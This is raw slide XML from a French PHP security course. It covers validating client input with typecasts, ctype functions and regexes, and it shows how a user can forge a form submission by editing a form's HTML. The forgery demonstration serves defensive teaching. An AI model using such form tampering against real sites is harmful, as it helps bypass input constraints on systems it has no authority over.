              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> ($_POST[’param1’])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>affiche($_POST[’param1’]); // NON !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>maj_sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_POST[’param1’]); // NON !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Dès la lecture des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>S’assurer que les données sont au format attendu.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Ne jamais utiliser directement les données client !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$clean = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>( ’param1’ =&gt; 0 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> ($_POST[’param1’])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>typecast</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$clean[’param1’] = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) $_POST[’param1’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Validation	- filtrage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Comment valider des données en PHP ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Quelques fonctions utiles :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>empty($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>in_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, $allowed);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($pattern, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ctype_digit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($var);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ctype_alpha</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ctype_alnum</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ctype_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>typecast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) $var;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Validation de données</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'exemple suivant valide une adresse mail:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$clean = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>email_pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = '/^[^@\s&lt;&amp;&gt;]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>email_pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, $_POST['email']))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$clean['email'] = $_POST['email'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'exemple suivant assure que $_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'] est un nombre entier:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$clean = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if ($_POST['num'] == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>intval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($_POST['num'])))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$clean['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'] = $_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Falsification des soumissions de formulaires</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>http://example.org/form.html:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;form action="/process.php" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;option value="red"&gt;red&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;option value="green"&gt;green&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;option value="blue"&gt;blue&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Code modifié :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> action="http://example.org/process.php" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="text" name="color" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:tx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fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:tx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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>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3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>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3">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
